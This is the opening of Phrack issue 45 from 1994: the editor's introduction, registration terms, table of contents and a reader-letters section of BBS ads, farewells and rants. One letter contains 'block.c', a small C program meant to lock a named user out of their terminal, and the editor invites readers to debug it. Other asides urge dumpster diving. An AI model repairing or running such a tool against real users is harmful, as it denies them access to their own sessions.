==Phrack Magazine== Volume Five, Issue Forty-Five, File 1 of 28 Issue 45 Index ___________________ P H R A C K 4 5 March 30, 1994 ___________________ ~ Dedicated to CRS--(1969-1994) ~ Well kiddies, it's Easter time again. Easter has got to be one of my favorite holidays of the bunch. No, no, no...not for any of that spiritual rebirth or religious hooey. Easter brings with it two of the most joyous items in the world: Reese's Peanut Butter Eggs and Marshmallow Peeps. In the past two weeks I have eaten my body weight many times over in peanut butter eggs. I don't know what it is about those damn things, but I just can't stop eating them. And the Peeps? Oh man, if you haven't put a Marshmallow Peep in the microwave, you just haven't lived. The cute little yellow duckie takes on whole new dimensions as it becomes superheated in the nuclear nightmare of a conventional microwave oven. It becomes like a scene from Akira as the Peep grows at an alarming rate, almost filling up the entire oven with its grossly mutated form. You can almost hear it squealing with agony. Go do it right now, and then finish reading this issue. The net has been more fun the past few months than a barrel full of monkeys, (or a hottub full of co-eds, pick your own comparison). In the time since last issue I have been the subject of a lot of attention. I've been pseudo-framed for hacking a handful of sites with fake syslog messages, I've been spoofed as the source of a pre-release CERT advisory, I've been mentioned in numerous altered motd files on many systems, and even better, spoofed messages from "erikb@mindvox.phantom.com" were posted to a homosexual listserv announcing my supposed "exit from the closet." Well, unfortunately for everyone, including the hundreds of hopeful gay respondents to the forged post, I only like women. But it sure is nice to know that even men are into me. What an ego boost. Seriously though, one has to wonder how the forgers knew that something called queernet.org even existed. I think I get around on the net, but I'd never heard of it. Have you? Perhaps the Posse are 'closer' than we thought. And the abuse continues. God knows why. The common thread seems to be: "Erikb is a nark." Let's look at that logic, shall we? If Erikb is a nark, then he would be on some terms with law enforcement. If he were on some terms with law enforcement, then he would have no qualms about handing over names of people doing bad things. If had no qualms about handing over names of people doing bad things, then law enforcement would open cases based on that information. If law enforcement opened cases based on that information, then people would get raided. If people would get raided, then people would almost certainly go to jail. Why on earth would someone want to evoke a chain of events that would land them in jail? Or do they not believe their own statements about me being a nark? Or are they convinced that they are so good that they cannot get caught? Or are they just pathetically stupid? Personally I choose the latter. These guys are not good. And they are very dumb. They make more mistakes than I've seen in a long time. And they've pissed off very powerful people. (No, I'm not including myself in that list of 'Powerful People.') It's good that much of MOD is getting out of jail soon. Now those guys were legitimately GOOD HACKERS. They were definitely assholes, but damn good computer hackers. It will be nice to have some harassment from dickheads with skills once again. But I digress. Phrack's gotten a bit of notice as of late. In Mondo-2000, in their "Pirate Media" article, and in Richard Kadrey's "Covert Culture" sourcebook. Of course both of these got the subscription information wrong, but hell, I've learned to expect as much. Also, the mention of Phreak Accident's fantastic "Playing Hide & Seek -- Unix Style" article in Dan Farmer and Weitse Venema's "Improving The Security of Your Site by Breaking Into It" article brought in hundreds of new subscribers. Let's see how many of these security people register. (How many fingers am I holding up?) Speaking of such, Phrack has a couple of other registrations now. One is a teacher who wanted to use Phrack in her class. Kudos to her! The other was a cool guy who just wanted to register because he felt like it. Why can't the rest of you be more like him? Anyway, the money is going to sponsor a new contest. (Considering how well the last one went...not!) This time, we are serious, so read in LINE NOISE for more info. What else? Phrack has now made the big time in the Federal Penal system. We're the proud recipients of the Bureau of Prisons form 328(58). Our material was considered to be a breach of security of the institution. This, of course, pissed me off. But hell, on the same form, they denote how "Body Hair, Plant Shavings, and Sexually Explicit Personal Photos" are also inappropriate. Phrack or Body Hair. You make the call. Phrack 45...let's see... If this issue doesn't cause neck hairs to bristle on everyone within spying distance of the beltway, I will be very disappointed. It's amazing what you find in your mailbox. We've got a lot of nifty things in this issue. More source code for you to play with, uuencoded goodness, cellular info, telco / pbx info, Ho Ho Con coverage, ancient hack memorabilia, and a plethora of spurious scatological material. (translated: lots of other crap) Enjoy. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : CERT (not) News : Datastream Cowboy Do Not Taunt : Happy Fun Ball Photography : dFx Dolomite : Rudy Ray Moore Prison Consultant : Co / Dec A Hacker's Dream : The L0PHT Thanks To : H.B. Reese Candy Co., Control C, Seven Up, Emmanuel Goldstein, The U.S. Government, The Omega, White Knight, Quentin, Manny Farber, Raoul, Video Games Magazine, Co/Dec, Darth Vader, Charlie X, The Fixer, Optik Nerve, Dr. Delam, Data King, Opticon the Disassembled "You're not too smart. I like that in a hacker." (With apologies to Kathleen Turner) Phrack Magazine V. 5, #45, March 30, 1994. ISSN 1068-1035 Contents Copyright (C) 1994 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.netsys.com (Phrack FTP Site) /pub/phrack phrack@well.sf.ca.us (Phrack E-mail Address) or phrackmag@aol.com Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg== =q2KB -----END PGP PUBLIC KEY BLOCK----- -= Phrack 45 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 17 K 2. Phrack Loopback Part I 31 K 3. Phrack Loopback Part II / Editorial 40 K 4. Line Noise Part I 49 K 5. Line Noise Part II 50 K 6. Line Noise Part III 59 K 7. Phrack Prophile on Control C 22 K 8. Running a BBS on X.25 by Seven Up 15 K 9. No Time for Goodbyes by Emmanuel Goldstein 21 K 10. Security Guidelines 55 K 11. Ho Ho Con Miscellany by Various Sources 32 K 12. Quentin Strikes Again by The Omega and White Knight 28 K 13. 10th Chaos Computer Congress by Manny E. Farber 23 K 14. Defcon II information 26 K 15. VMS Information by Various Sources 34 K 16. DCL BBS PROGRAM by Raoul 23 K 17. Hollywood-Style Bits & Bytes by Richard Goodwin 50 K 18. Fraudulent Applications of 900 Services by Co/Dec 15 K 19. Screwing Over Your Local McDonald's by Charlie X 20 K 20. The Senator Markey Hearing Transcripts 72 K 21. The Universal Data Converter by Maldoror 45 K 22. BOX.EXE - Box Program for Sound Blaster by The Fixer 13 K 23. Introduction To Octel's ASPEN by Optik Nerve 12 K 24. Radio Free Berkeley Information 35 K 25. The MCX7700 PABX System by Dr. Delam 22 K 26. Cellular Debug Mode Commands by Various Sources 13 K 27. International Scenes by Various Sources 63 K 28. Phrack World News by Datastream Cowboy 17 K Total: 902 K _______________________________________________________________________________ "You can't hold a man down without staying down with him." (Booker T. Washington) "I am not one of those weak-spirited, sappy Americans who want to be liked by all the people around them. I don't care if people hate my guts; I assume most of them do. The important question is: 'What are they in a position to do about it?'" (William S. Burroughs) ==Phrack Magazine== Volume Five, Issue Forty-Five, File 2 of 28 **************************************************************************** Phrack Loopback Part I Letter from Louis Cypher (Byron York) As many people know, I was convicted over the summer for a number of Federal crimes including counterfeiting, burglary of a post office, theft of US mail, and possession of stolen property. For a little background, I was arrested for these crimes in September of 1992. I stayed out on 50,000 dollar bond until the trial which started the day after Summercon 93'. The trial lasted for about a week and a half, and the jury found me guilty on 4 charges and acquitted me on 2. My sentencing was not until the 8th of November, and the results were not as I had hoped for being a first time offender and all. I received a 21 month sentence that will be carried out if I do not complete 6 months in a Federal boot camp in Pennsylvania. If I do complete the program at the boot camp I will then spend 6 months in a Federal halfway house in Houston. This will be followed by several months of home confinement, then 3 years parole. I am to attend college while on parole, but if I do not do well, then I have to do 300 hours of community service. I will start serving my sentence as early as December, or as late January. Won't know until I receive the letter in the mail from the Bureau of Prisons. I am still out on bond and am on voluntary surrender so I just deliver myself to wherever they send me. A lot better than rotting in county jail until they transfer me. I will hopefully be out still for HoHocon, and will be able to say good-bye to most people in person. But in case I am not, then I would like to use this forum to tell everyone good-bye. I know that I am not going away forever, but I don't know when I am going to be able to access a modem again and get back in touch with everybody. I have been running a public access Internet site in Houston for the past year or so, and luckily, thanks to Drunkfux, Absalom, and Lord Macduff, the system will most probably stay up in my absence. People will be able to mail me there, and I will be able to respond through the help of people over the phone. I would like to thank Erik Bloodaxe for letting me use Phrack to tell everybody farewell. I hope nothing's changed when I get back, and I will be back. I'll just have to keep my nose a little cleaner when I come back from my sabbatical. It's been great, and I'll see all of you hopefully in about a year or so. [Byron did get to go to HoHoCon, but shortly thereafter had to fly to Pennsylvania to enter Boot Camp. Byron's Address in prison is: J.C.C. Byron York 60177-079 P.O. Box 1000 Lewisburg, PA 17837-1000 Drop him a note. It really makes the day go by a little easier in a world of bloody shank wars with the Texas Syndicate. Jail sucks.] ------------------------------------------------------------------------------ [Ad for Jolly Roger T-Shirt] >[God bless the free enterprise system! > God bless capitalism! > God bless America!] Well, I'm an atheist and natural law objectivist, so I'll cheer right along with you on the capitalism part! Capitalism is the only MORALLY PROPER system because it's the only system (or lack thereof) that doesn't treat people as slaves! [editorial] >This is going to piss people off, but hell, that's the point of having >an editorial, eh? I, for one, fucking loved it. >Granted, Holland has a notoriously permissive and open society; and >indeed, Europe in general is far more laid back than the States, but >even many in the US hold these ideals close to heart. Europe also has a great police state tradition, not to mention the common and prevailing attitude that while sex and drugs and rock and roll are okay, making money (creating wealth) is a far more heinous crime. >...The major cons in America (HoHo, Scon) really don't charge. >They "ask" for donations. Sure, you might get a nasty look if >you don't cough up five or ten bucks, but hell, everyone does. They >WANT to. A good time is worth a handful of change. And there isn't >some awesome requirement just to get in the damn door. Besides, losses >can always be made up by selling a plethora of crap such as t-shirts and >videos, which everyone always wants to buy. (Hardware costs. :) ) VOLUNTARY donations! (The Supreme Court says "our system of taxation is based on VOLUNTARY COMPLIANCE"...) There's a vast and monstrous difference between voluntary and involuntary - it's that nasty "free will thing"! >Then there was Phrack. Always free to the community. Always available >for everyone's enjoyment. Asking only that Corporate types pay a >registration fee of a hundred dollars just to keep them honest. (They >aren't.) Knowing full well that they are stealing it, sometimes quite >brazenly. Resting quietly, knowing that they are just as unethical as >they ever claimed us to be. I also love your registration requirements. Being able to claim ownership of property, intellectual or otherwise, means you dictate the terms and conditions of its use. Corporate lawyers must have had coronaries upon first sight. Only difficulty is, your ISSN number and copyright data are prima facie evidence that you contracted away rights in exchange for privilege from the state, revocable whenever the state feels like it (copyright falls under admiralty jurisdiction, not common law). You've formed an "organization" - your registration form recognizes the fact that "corporations, organizations and other artificial persons" have a lesser STATUS before the law than NATURAL INDIVIDUALS - just be who you are! >Let me tell you something. Information does not want to be free, my >friends. Free neither from its restraints nor in terms of dollar value. >Information is a commodity like anything else. More valuable than the >rarest element, it BEGS to be hoarded and priced. Anyone who gives >something away for nothing is a moron. (I am indeed stupid.) I can't >fault anyone for charging as long as they don't try to rationalize their >reasoning behind a facade of excuses, all the while shouting "Information >Wants to be Free!" AMEN, from the highest fucking rooftops! You're not stupid, you're doing it by CHOICE. You're VOLUNTARILY doing it. Free people don't NEED laws that force decisions upon them - they do what needs to be done! >Trade secrets don't want to be free, marketing projections don't want to >be free, formulas don't want to be free, troop placements don't want to >be free, CAD designs do not want to be free, corporate financial >information doesn't want to be free, my credit report sure as hell >doesn't want to be free! YES! YES! I HAVE WAITED FOR YEARS FOR THIS MOMENT! [tale of the Little Red Hen] Amen again! This whole issue, in fact, had many great things, which I'll continue to reply to here... [ ... 10K of commentary removed ... ] Finally...remember how crazy people got in the years just before the turn of the first millennium (990-1000 A.D.)? It's gonna be even MORE interesting this time around! Here's to Phrack... may you last into the 21st century! (May we ALL be so lucky...) [Man, that was one of the coolest letters we've ever gotten (and definitely the longest. I have to tell you, it does my heart good to know that we are indeed appreciated by some of you. We will continue to do so until as long as humanly (or inhumanly, with my schedule) possible.] ------------------------------------------------------------------------------ A document I found in trash...... What's Next 1993 Revenue 1993 Operating in billions Cash Flow in billions AMERITECH $11.71 $4.72 Pursue in-region strategy. Push regulators for entry into long distance business. BELL ATLANTIC $12.99 $5.34 Proceed with interactive networks linking 1.2 million homes by year-end 1995. Seek local cable partners. BELLSOUTH $15.88 $6.64 Decide whether to invest $500 million of QVC, despite loss in Paramount fight. NYNEX $13.4 $5.06 Proceed with $1.2 billion investment in Viacom. Build new networks in Northeast, but only if it wins new regulatory freedom. PACTEL $10 $4.08 Pursue in-region strategy for new personal communication services. SOUTHWESTERN BELL $10.69 $4.08 Pursue cable relationship with Cox Enterprises Inc.; complete $552 million acquisition of upstate New York cellular franchises. USWEST $10.29 $4.45 Offer new phone services in New York cable systems; may pursue Cablevision Systems Corp. with partner Time Warner. Total $84.98 $34.53 Gee whiz now I really sympathize with the phone company about their petty loss on fraud. [Fuck. And you mean to tell me THEY can't afford a measly 100 bucks registration fee? Maybe them thought it was 100 Million bucks. But even then it's well within their grasp. Hmm...maybe the fee should go up.] ------------------------------------------------------------------------------ I would like to pay respects to a fellow user on my system who was killed in the recent helicopter crash near San Jose, CA. "Rotor" was a user-friendly d00d who would always talk your ear off about helicopter technician work. It is a great loss to our local community. Call the CybernaughtG@twAy. el33t x10^8 (408) 911-3974 Login --------------================--------------- [I want to say I'm very sorry about your friend. I know exactly how you must feel.] ------------------------------------------------------------------------------ For immediate rebroadcast:::::::::::::::::::::: ********************************************************************* The SenseReal Foundation The SenseReal Foundation is a non-profit, non-organization dedicated to the preservation and free distribution of information and the promotion of the Amiga computer. In this ever increasing police state we live in the Amiga computer is a beacon of hope. If you buy into Big Blue you are buying into Big Brother. The information revolution is happening now. More and more our liberty will depend on the acquisition, processing, dissemination, and control of knowledge. We are heading into an era when there's going to be enormous pressure to prevent further development of certain kinds of knowledge. This situation has created the need for the...... SenseReal Archives Send all kinds of information to the SenseReal archives for preservation and rebroadcast. Send newsletters, magazines, books, 'zines, tapes, CDs, or anything at all to the address below. Not only will your contribution be deeply appreciated, it will be preserved and made available to present and future generations. As more powerful, small, cheap technologies are available to the masses it may increase conflict between the current power structure and those now considered to be in the underground. Civilization as we know it is racing towards the brink, and hopefully we will survive through this current cycle, but we do not know what will face us then. Sending The SenseReal Foundation your material is a good way of expanding the knowledge of many people. When appropriate, information will be made available on the SenseReal BBS..... The Haunted Mansion BBS (404)516-4732 Fri-Sun 6pm-6am Call this number anytime. Primary hours are Fri-Sun 6PM-6AM but you never know when the board may be up. If it is not online when you call, call back in 3-5 minutes and perhaps it will be. It is primarily an Amiga board but also features message areas and a text file area that will be of interest to all. Send postcards, bizarre items, money, and anything else to: Call THE HAUNTED MANSION BBS THE SENSEREAL FOUNDATION (404)516-4732 Fri-Sun 6PM-6AM 6595-G ROSWELL RD. Suite #206 Or contact via the Internet: ATLANTA,GA 30328 Green_Ghost@neonate.atl.ga.us All information and anything sent will be kept secret forever upon request. -- Via DLG Pro v1.0 [Uh, gee, little did I realize that when I bought my Amiga 500, I was joining such a sacred brotherhood. I wonder what my employers would think.] ------------------------------------------------------------------------------ So, there I am in New York City last night. We're hanging out (figuratively speaking) at The Vault, where various fetishists get together to explore the limits of aberrant human sexuality. All in all, a rather interesting place. The $30 cover was a little steep, but I would still highly recommend it. Now for my point. I was standing around watching two dominatrix abuse some naked, prostrate wretch when one of them started walking around giving out business cards to anyone who admitted to having a computer and an Internet feed (these are dominatrix on the cutting edge of technology, I might add). The card reads thus: CYBEROTICA Online Ride the wave of erotic communication into the 21st century, as CYBEROTICA Online(tm) becomes your point-of-penetration into Cyberspace. Transport yourself into a universe of wild fantasy- and-fetish images, tales, and intimate, anonymous interaction with erotic-video stars, industry insiders, and thousands of open-minded people around the world. Experience CYBEROTICA Online for FREE as our VIP guest while we perfect the system, and in exchange for your valued input you'll receive added VIP privileges as we grow! Contact us today for your free Infopac and Startup Software, before this opportunity ends. 212.587.0197 fax 587.0513 80 n moore st., tribecca, ny 10013 email: steffani@echonyc.com I am sure this is just a teaser to get people on-line and then start charging them, but I found it pretty interesting. ---tabas NOTE: I have no knowledge of or affiliation with the above organization and the posting of this message does not constitute an endorsement of perversion. [Well, hell...now I know where to go next month when I'm back in NYC. I wish I would have know about this place last time...the only places I could find for even semi-serious sleeze was in Times Square, and I know that was way too tame and trendy to be IT. Now I know.] ------------------------------------------------------------------------------ The earthquake in Los Angeles, California, the flood in Europe, the seemingly unstoppable war in the former Yugoslavia, the devastating fires in Australia, the flood in the Midwest of the United States of America, the devastating fires near Los Angeles, California, the rapid and appalling increase in violence in cities, towns, villages all over the world, the famines, the diseases, the rapid decline of the family unit, and the destructive earthquake in India (in 1993) are signs that this world's history is coming to a climax. The human race has trampled on God's Constitution, as given in Exodus 20:1-17 (King James Version Bible), and Jesus is coming to set things right. These rapidly accelerating signs are an indication that Jesus is coming soon (Matthew 24). God's Holy Spirit is gradually withdrawing its protection from the earth and the devastating events you see are demonstrations of Satan's power. All those who are not guarded by God are in danger of forever losing eternal life. If you want to know what's about to happen, please study the books of Daniel and Revelation which are located in God's Word, the Bible. They are not sealed or closed books. They can and must be understood by all. Every word in the Bible from Genesis to Revelation is true. The Bible and the Bible only must be your guide. When God's Law (the Constitution for the Universe) is consistently ignored, disregarded, changed, and questioned, He permits certain events to occur to wake us up. I would urge all, wherever you are and regardless of the circumstances, to directly call on Jesus and ask Him to intervene in your life. Jesus who created this planet and every living creature in it and on it, died on the cross, was raised from the dead by God the Father, and is now in Heaven interceding for you. Jesus is the only One who can rescue us from the slavery, misery, and death Satan is causing us. For reference I'm including God's Constitution as given in the King James Version Bible. Please note that when God says the seventh day, he means Sabbath (the 7th day of the week) not Sunday (1st day of the week). Commandment #1: Exodus 20:1-3 (KJV) And God spake all these words, saying, I am the LORD thy God, which have brought thee out of the land of Egypt, out of the house of bondage. Thou shalt have no other gods before me. Commandment #2: Exodus 20:4-6 (KJV) Thou shalt not make unto thee any graven image, or any likeness of any thing that is in heaven above, or that is in the earth beneath, or that is in the water under the earth. And shewing mercy unto thousands of them that love me, and keep my commandments. Commandment #3: Exodus 20:7 (KJV) Thou shalt not take the name of the LORD thy God in vain; for the LORD will not hold him guiltless that taketh his name in vain. Commandment #4: Exodus 20:8-11 (KJV) Remember the sabbath day, to keep it holy. Six days shalt thou labour, and do all thy work: But the seventh day is the sabbath of the LORD thy God: in it thou shalt not do any work, thou, nor thy son, nor thy daughter, thy manservant, nor thy maidservant, nor thy cattle, nor thy stranger that is within thy gates: For in six days the LORD made heaven and earth, the sea, and all that in them is, and rested the seventh day: wherefore the LORD blessed the sabbath day, and hallowed it. Commandment #5: Exodus 20:12 (KJV) Honour thy father and thy mother: that thy days may be long upon the land which the LORD thy God giveth thee. Commandment #6: Exodus 20:13 (KJV) Thou shalt not kill. Commandment #7: Exodus 20:14 (KJV) Thou shalt not commit adultery. Commandment #8: Exodus 20:15 (KJV) Thou shalt not steal. Commandment #9: Exodus 20:16 (KJV) Thou shalt not bear false witness against thy neighbour. Commandment #10: Exodus 20:17 (KJV) Thou shalt not covet thy neighbour's house, thou shalt not covet thy neighbour's wife, nor his manservant, nor his maidservant, nor his ox, nor his ass, nor any thing that is thy neighbour's. I also recommend that the following books be obtained and closely studied: The Great Controversy By Ellen G. White Review and Herald Publishing Association Hagerstown, MD 21740 The Desire of the Ages By Ellen G. White Review and Herald Publishing Association Hagerstown, MD 21740 Patriarchs and Prophets By Ellen G. White Review and Hearld Publishing Association Hagerstown, MD 21740 Daniel and the Revelation By Uriah Smith Review and Herald Publishing Association Hagerstown, MD 21740 [Praise the Lord & Pass the Ammunition!] ------------------------------------------------------------------------------ Big Brother Inside Logo A parody of the Intel's Logo modified for the Clipper Chip is now available for use for stickers, posters, brochures etc. The Big Brother Inside graphic files are now available at the CPSR Internet Archive - ftp/gopher cpsr.org /cpsr/privacy/crypto/clipper big_brother_inside_sticker.ps (postscript-scale to fit your project) big_brother_inside_logo.gif (Color GIF - good startup/background screen) big_brother_inside_picts_info.txt (Info on the files) The files have also been uploaded to America Online in the Mac Telecom and Graphic Arts folders. big_brother_inside_sticker.ps is a generic postscript file, created in CorelDraw. The postscript image lies landscape on the page, and consists of the intel-logo's ``swoosh'' and crayon-like lettering on the inside. This design was originally created for the sticker project: the image was screened onto transparent stickers 1" square for the purpose of applying them to future clipper-chip products. (cdodhner@indirect.com was in charge of that project; as far as I know he's still distributing them for a small donation to cover printing & mailing costs). The design was created by Matt Thomlinson [The stickers I have made a HUGE hit among the various "select targets" at COMDEX. Get yours and join in on the fun. There are a world of mass merchant distributors waiting to be "tagged." Sounds like the SenseReal foundation would love a handful of these for those pesky Intel boxes.] ------------------------------------------------------------------------------ HI, 1st I want to thank you for dedicating your space to the silliness and foolishness that comes with anything Sara Gordon related. I think I should have gotten the last word but, who wants to turn this into a public feud, specially with a demented middle aged woman. Well, Thanks anyway for including the article, I have found people in the underground who believe what I am saying, as I have no monetary interest in this unlike Mrs. Gordon. Kohntark. [Well Kohntark, looks like you DID get the last word. No, wait, I did.] ------------------------------------------------------------------------------ Hello Chris, I have a constant battle with some of my friends over who can ruin another person's display first. Well, if I could log them out... However, I'm afraid the program doesn't compile. Thanks for any light you might be able to shed on the matter. Bye! I get these 3 errors: "block.c", line 22.17: 1506-030 (S) Identifier open cannot be redeclared. "block.c", line 41.18: 1506-045 (S) Undeclared identifier user. "block.c", line 48.16: 1506-045 (S) Undeclared identifier W_OK. /* block.c -- prevent a user from logging in * by Shooting Shark * usage : block username [&] * I suggest you run this in background. */ #include #include #include #include #include #define W_OK2 #define SLEEP5 #define UTMP"/etc/utmp" #define TTY_PRE "/dev/" main(ac,av) int ac; char *av[]; { int target, fp, open(); struct utmpuser; struct termio*opts; char buf[30], buf2[50]; if (ac != 2) { printf("usage : %s username\n",av[0]); exit(-1); } for (;;) { if ((fp = open(UTMP,0)) == -1) { printf("fatal error! cannot open %s.\n",UTMP); exit(-1); } while (read(fp, &user, sizeof user) > 0) { if (isprint(user.ut_name[0])) { if (!(strcmp(user.ut_name,av[1]))) { printf("%s is logging in...",user.ut_name); sprintf(buf,"%s%s",TTY_PRE,user.ut_line); printf("%s\n",buf); if (access(buf,W_OK) == -1) { printf("failed - program aborting.\n"); exit(-1); } else { if ((target = open(buf,O_WRONLY)) != EOF) { sprintf(buf2,"stty 0 > %s",buf); system(buf2); printf("killed.\n"); sleep(10); } } /* else */ } /* if strcmp */ } /* if isprint */ } /* while */ close(fp); /*sleep(SLEEP); */ } /* for */ } [Anyone want to take a crack at this?? Debug it and mail it back to us so we can forward it on...] ------------------------------------------------------------------------------ xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx IT'S BACK!!!!W$#@$#@$ _-_-_-_-_-_-_-_-_ ( ) ( B00m ) ( ) CAU (__ __) CAU __\/___ "We WiLL BloW /---/|_____|\----\ uP YoUr CaR!" /CaU-__WuZ__-HeRe\- (0) (0) fARM R0Ad 666 *fR666.something.com* (713)855-0261 *fR666.something.com* CAU-0b/GYN SySoPs: EighT BaLL kCf-ThP-Phrack M.C. Allah Bc0maP-d0S/2-Tone Drunkfux ' CAU Home ' Bc0maP Couriers Site ' cDc Factory Direct Outlet(kCf) ' 0b/GYN Member Site ' USENET, InterNet E-Mail(s00n) ' Hack/Phreak Discussions ' Flashback Software ' ToneLoc Distribution Site ' 12oo-14.4 bps ' Exophasia Submission Site ' 0PhiCiAl PHraCk DiSt Site ' No Ratios for non dorks xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx [This is 8-Ball's bbs. Call it and watch him shoot up. Word.] ------------------------------------------------------------------------------ Hackers, phone phreaks, techno-anarchists, cyberpunks, etc. * * * THE OFFICIAL U.K. '2600 Magazine' MONTHLY MEETINGS. * * * Meetings are held on the first Friday of each month. All those interested in attending will be required to meet at the Trocadero shopping centre, which is a one minute walk from the Picadilly Circus underground station, London. The meeting point is actually inside the shopping centre, next to the Virtual Reality machines located on the bottom floor. Anyone interested in taking part should assemble next to these machines between 7.00pm and 8.00pm. Those who attend will then travel by tube train to a 'unknown' location for computer underground discussion, information exchange, etc. For more information, phone 'Damian' on 071-262-3042, or send email to 'uabbs@works.com' Check page '46' of your latest '2600 Magazine' for details of other meeting locations, etc. 2600 Magazine PO Box 752 Middle Island NY 11953 U.S.A. Tel: +1-516-751-2600 (24 hour answering system) Fax: +1-516-751-2608 -------------------------------------------------------------------------- This bulletin was created by 'Phantasm' on Tuesday 08-Feb-94 at 11:51pm. [You brits: GO TO THESE MEETINGS! And go trashing afterwards! And raise some hell. Throw caution to the wind. Be loud and obnoxious. Get thrown out. (Just pretend you are Americans. It works every time.) ] ------------------------------------------------------------------------------ Hello, I run a board here in the UK known as Unauthorised Access. We have been online since 1990 (the year of our anti-hacking law's approval) and the system is now the largest computer underground board in the U.K. (2,000+ quality files and growing each day) I also attended the HEU congress in Holland but although I spoke with Eric Corley (2600) and BillSF (Hack-Tic), I did not know where to find you. I expect you dissappeared off to Amsterdam like so many of the other visitors to Holland. Anyway, I noticed in your last issue (44) that you seem to have quite a few readers in the United Kingdom. I would like to tell you about my system here in the UK. (Please include this advert in your next issue of PHRACK) Thanks! Unauthorised Access Online 10.00pm-7.00am GMT Established 1990 Britain's largest computer underground system 30+ message special interest groups 2,000+ underground file online c64/Amiga/IBM/ h/p util support Running at 3oo/12oo/24oo/96oo HST tel: +[44] 636-708063 SysOp: Phantasm ---------------------------------------- [I always dig Overseas BBSes. Unfortunately I couldn't get a strong line when I've tried to call. Geez, you would think that in this age of fiber, I may be able to connect...but noooooo. :) ] ------------------------------------------------------------------------------ New TimeWasters T-shirts ! Do you know the feeling ? You're behind your terminal for hours, browsing the directories of your school's UNIX system. Instead of holes, bugs and bad file permissions you find tripwire, TCPwrapper and s/key. You run a file with a s-bit and immediately you get a mail from the system admin asking what you are doing. In other words, no chance to ever become a good hacker there. Now you have the chance to at least pretend to be an eleet hacker. The Dutch hacking fanatics The 